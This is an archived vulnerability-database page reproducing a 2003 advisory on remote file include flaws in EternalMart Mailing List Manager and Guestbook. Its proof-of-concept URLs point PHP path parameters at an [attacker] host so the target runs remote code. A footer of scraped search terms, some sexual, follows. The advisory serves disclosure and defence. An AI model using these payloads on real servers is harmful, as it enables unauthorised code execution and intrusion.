about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , EternalMart Multiple Remote File Include Vulnerabilities


Title EternalMart Multiple Remote File Include Vulnerabilities
Published 2003-10-04-12:00AM
Updated 2003-10-04-11:25PM
Class Input Validation Error
CVE   CVE-MAP-NOMATCH
Remote  Yes
Local  No
Credit  Discovery is credited to Frog Man <leseulfrog@hotmail.com>.
Vulnerable  EternalMart Mailing List Manager 1.32
EternalMart Guestbook 1.1
Not Vulnerable  
Code   The following proof of concept was provided:

Mailing List Manager:

http://[target]/admin/auth.php?emml_admin_path=http://[attacker] will
include the file :
http://[attacker]/auth_func.php

http://[target]/emml_email_func.php?emml_path=http://[attacker] will
include the file :
http://[attacker]/class.html.mime.mail.php

Guestbook:

http://[target]/admin/auth.php?emgb_admin_path=http://[attacker] will
include the file :
http://[attacker]/auth_func.php
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 01:17:41 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
200 /compo www.it197. ip board 2 FRONTPAGE Nekkidsex Blue films com_jcs/vi man utd /functions site sexe kaht2.exe 200 %2Fcom 200 /compo Mallikasha modules%2f www.12av.c Italia gir Sow www.xiao77 CMS is Fre lobos teen se x latinas ca www.gupiao www.zongti malayalamb www.sexima news for c Trisha bat manele_200 components includes/d bollywood www.sexyvi applicatio Niked girl mambo Remo courier po Www.sextv. news for c Dotproject Www.Sexygi ww.sex.com Black ass. Joomla Com dolphin.ht Www.Sexygi Vedw sxs moe hAY KO WWW.Sex300